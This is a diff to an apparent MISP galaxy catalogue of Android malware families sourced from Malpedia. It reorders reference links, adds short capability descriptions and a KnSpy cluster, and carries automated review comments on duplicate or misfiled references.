+ "description": "According to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irata",
- "https://onecert.ir/portal/blog/irata",
 "https://twitter.com/muha2xmad/status/1562831996078157826",
- "https://muha2xmad.github.io/malware-analysis/irata/"
+ "https://muha2xmad.github.io/malware-analysis/irata/",
+ "https://onecert.ir/portal/blog/irata"
 ],
 "synonyms": [],
 "type": []
@@ -1800,22 +1851,22 @@
 "value": "JadeRAT"
 },
 {
- "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.",
+ "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google\u2019s official app store with the help of its trail signatures which includes updating the virus\u2019s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users\u2019 personal information including contact details, device data, WAP services, and SMS messages.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker",
- "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/",
- "https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/",
- "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1",
- "https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/",
- "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
- "https://labs.k7computing.com/?p=22199",
 "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451",
- "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://muha2xmad.github.io/malware-analysis/hydra/",
 "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html",
+ "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/",
 "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/",
+ "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1",
+ "https://labs.k7computing.com/?p=22199",
 "https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2",
- "https://muha2xmad.github.io/malware-analysis/hydra/"
+ "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
+ "https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/"
 ],
 "synonyms": [
 "Bread"
@@ -1830,9 +1881,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/",
- "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html"
+ "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf"
 ],
 "synonyms": [],
 "type": []
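Review bot: The Joker reference list on the new side still carries `https://muha2xmad.github.io/malware-analysis/hydra/`, a Hydra write-up that also sits under the apk.hydra cluster in the previous hunk; it was already present before this patch and the commit only moves it down the list, so the mis-filing looks inherited from the upstream mapping rather than introduced here. If the generator copies refs verbatim from Malpedia, the fix belongs in the source mapping; otherwise the Joker entry should drop the Hydra link. The Joker object starts in this hunk and continues past it.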
@@ -1840,6 +1891,24 @@
 "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0",
 "value": "KevDroid"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.knspy",
+ "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html",
+ "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
+ "https://twitter.com/voodoodahl1/status/1267571622732578816",
+ "https://s.tencent.com/research/report/951.html",
+ "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/",
+ "https://community.riskiq.com/article/6f60db72"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b",
+ "value": "KnSpy"
+ },
 {
 "description": "",
 "meta": {
@@ -1871,9 +1940,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter",
- "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf",
 "https://www.youtube.com/watch?v=nilzxS9rxEM",
 "https://twitter.com/malwrhunterteam/status/1337684036374945792",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf",
 "https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/"
 ],
 "synonyms": [],
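Review bot: The new KnSpy cluster is added with an empty `description` and a fresh uuid, while the same six DoNot/APT-C-35 references are removed from the apk.unidentified_005 cluster later in the patch (hunk `@@ -2957,13 +3033,7 @@`), which keeps its old uuid with only the Malpedia link left. If this is an upstream rename of unidentified_005 to KnSpy, existing MISP correlations against the unidentified_005 uuid silently lose their references; a `related` entry of type `similar` between the two uuids, or a one-line description such as `Formerly tracked by Malpedia as apk.unidentified_005`, would preserve the link. Whether it is a rename rather than a re-attribution cannot be told from the diff alone.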
@@ -1900,13 +1969,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
- "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf",
 "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://muha2xmad.github.io/mal-document/lokibotpdf/",
- "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
- "https://isc.sans.edu/diary/27282",
 "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html",
- "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/"
+ "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://muha2xmad.github.io/mal-document/lokibotpdf/",
+ "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/",
+ "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf",
+ "https://isc.sans.edu/diary/27282"
 ],
 "synonyms": [],
 "type": []
@@ -1945,8 +2015,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher",
- "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
 "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
 "https://securelist.com/mobile-malware-evolution-2019/96280/"
 ],
 "synonyms": [
@@ -1958,7 +2028,7 @@
 "value": "Marcher"
 },
 {
- "description": "",
+ "description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers\u2019 goal is to steal credit card information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred",
@@ -1977,8 +2047,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot",
- "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html",
- "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/"
+ "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/",
+ "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html"
 ],
 "synonyms": [],
 "type": []
@@ -1991,8 +2061,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa",
- "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
 "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
 "https://twitter.com/ThreatFabric/status/1285144962695340032"
 ],
 "synonyms": [
@@ -2008,9 +2078,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter",
+ "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
 "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe",
 "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
- "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
 "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12"
 ],
 "synonyms": [],
@@ -2050,23 +2120,23 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao",
- "https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends",
- "https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html",
- "https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484",
- "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
- "https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/",
- "https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/",
- "https://www.xanhacks.xyz/p/moqhao-malware-analysis",
- "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
- "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/",
- "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
- "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
- "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/",
- "https://securelist.com/roaming-mantis-part-v/96250/",
 "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
- "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf"
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/",
+ "https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
+ "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
+ "https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends",
+ "https://www.xanhacks.xyz/p/moqhao-malware-analysis",
+ "https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/",
+ "https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/",
+ "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
+ "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/",
+ "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/",
+ "https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484",
+ "https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html"
 ],
 "synonyms": [
 "Shaoye",
@@ -2122,8 +2192,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat",
- "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co",
 "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/",
+ "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co",
 "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT"
 ],
 "synonyms": [],
@@ -2166,12 +2236,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance",
- "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view",
 "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf",
 "https://securelist.com/it-threat-evolution-q2-2020/98230",
 "https://securelist.com/apt-phantomlance/96772/",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf",
- "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html"
+ "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html",
+ "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view"
 ],
 "synonyms": [
 "PWNDROID1"
@@ -2208,7 +2278,7 @@
 "value": "PINEFLOWER"
 },
 {
- "description": "",
+ "description": "According to PCrisk, The PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.\r\n\r\nIn addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixpirate",
@@ -2241,9 +2311,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat",
+ "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ",
 "https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/",
- "https://labs.k7computing.com/?p=22537",
- "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ"
+ "https://labs.k7computing.com/?p=22537"
 ],
 "synonyms": [],
 "type": []
@@ -2403,12 +2473,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe",
- "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/",
- "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
 "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html",
+ "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/",
+ "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
+ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
 "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
- "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html"
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga"
 ],
 "synonyms": [],
 "type": []
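Review bot: The new PixPirate description is the only one in this patch that carries `\r\n\r\n` paragraph breaks inside the string, while the other multi-sentence descriptions added here (IRATA, Revive, MasterFred) are single paragraphs. The escaped carriage returns are valid JSON, but they surface as stray line endings in any consumer that renders the field, and they suggest the scraper copies the source page's line endings without normalising them. Collapsing them to a single space or `\n` in the generator would keep the field consistent across clusters. The PixPirate object continues past the hunk.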
@@ -2417,7 +2487,7 @@
 "value": "Retefe (Android)"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.revive",
@@ -2448,12 +2518,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
- "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
- "https://securelist.com/roaming-mantis-reaches-europe/105596/",
+ "https://securelist.com/roaming-mantis-part-v/96250/",
 "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
 "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/",
- "https://securelist.com/roaming-mantis-part-v/96250/",
- "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf"
+ "https://securelist.com/roaming-mantis-reaches-europe/105596/",
+ "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
+ "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/"
 ],
 "synonyms": [],
 "type": []
@@ -2506,13 +2576,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sharkbot",
- "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/",
- "https://muha2xmad.github.io/malware-analysis/sharkbot/",
- "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/",
- "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
- "https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe",
 "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/",
+ "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/",
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
+ "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/",
+ "https://muha2xmad.github.io/malware-analysis/sharkbot/",
 "https://bin.re/blog/the-dgas-of-sharkbot/",
+ "https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe",
 "https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/"
 ],
 "synonyms": [],
@@ -2522,11 +2593,12 @@
 "value": "SharkBot"
 },
 {
- "description": "",
+ "description": "SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sidewinder",
- "https://ti.qianxin.com/blog/articles/analysis-of-malware-android-software-spread-by-sidewinder-using-google-play/"
+ "https://ti.qianxin.com/blog/articles/analysis-of-malware-android-software-spread-by-sidewinder-using-google-play/",
+ "https://www.group-ib.com/blog/hunting-sidewinder/"
 ],
 "synonyms": [],
 "type": []
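Review bot: The new SideWinder description in the second hunk describes a campaign (`SideWinder involved a fake VPN app ...`) rather than the Android sample the apk.sidewinder cluster stands for, so a reader cannot tell whether `SideWinder` here names the malware or the actor that Malpedia attributes it to. A phrasing that keeps the same facts but opens with the artefact, such as `Android malware attributed to the SideWinder actor, distributed as a fake VPN app on Google Play together with a custom tool that filters victims for better targeting.`, would match how the other descriptions in this patch open. The SideWinder object continues past the hunk.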
@@ -2565,8 +2637,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo",
- "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html",
- "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
+ "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html",
+ "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html"
 ],
 "synonyms": [
 "SlemBunk"
@@ -2595,8 +2667,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/",
- "https://blog.alyac.co.kr/2128"
+ "https://blog.alyac.co.kr/2128",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/"
 ],
 "synonyms": [],
 "type": []
@@ -2621,12 +2693,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova",
+ "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail",
 "https://muha2xmad.github.io/malware-analysis/sova/",
- "https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections",
 "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/",
 "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html",
- "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail",
- "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly"
+ "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly",
+ "https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections"
 ],
 "synonyms": [],
 "type": []
@@ -2666,10 +2738,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax",
- "https://twitter.com/malwrhunterteam/status/1250412485808717826",
 "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html",
- "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
- "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league"
+ "https://twitter.com/malwrhunterteam/status/1250412485808717826",
+ "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league",
+ "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions",
+ "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset"
 ],
 "synonyms": [],
 "type": []
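Review bot: The added `https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions` duplicates the `...-institutions.html` entry three lines above, so the same article is now listed twice under SpyMax; the SpyNote hunk (`@@ -2682,18 +2755,21 @@`) adds the same pair, and the ZooPark hunk (`@@ -3249,11 +3332,11 @@`) keeps `whos-who-in-the-zoo/85394` both with and without a trailing slash. These are near-duplicates that a plain set comparison in the generator cannot catch; normalising refs (strip a trailing `.html` or `/`) before de-duplication, or keeping one canonical form in the upstream mapping, would clear all three. Until then one entry of each pair should go.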
@@ -2682,18 +2755,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
- "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
- "https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/",
 "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
+ "https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions",
+ "https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/",
 "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
+ "https://labs.k7computing.com/index.php/spynote-targets-irctc-users/",
 "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html",
- "https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/",
- "https://labs.k7computing.com/index.php/spynote-an-android-snooper/",
- "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan",
- "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
 "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
 "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/"
+ "https://labs.k7computing.com/index.php/spynote-an-android-snooper/",
+ "https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions",
+ "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
+ "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan"
 ],
 "synonyms": [
 "CypherRat"
@@ -2735,8 +2811,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/"
+ "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
 ],
 "synonyms": [],
 "type": []
@@ -2873,16 +2949,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
- "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/",
- "https://securelist.com/apkpure-android-app-store-infected/101845/",
- "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
- "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
+ "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
 "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html",
 "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/",
+ "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/",
+ "https://securelist.com/apkpure-android-app-store-infected/101845/",
 "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
- "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
- "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/"
+ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
+ "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
+ "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
+ "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/"
 ],
 "synonyms": [],
 "type": []
@@ -2891,7 +2967,7 @@
 "value": "Triada"
 },
 {
- "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
+ "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout"
@@ -2957,13 +3033,7 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005",
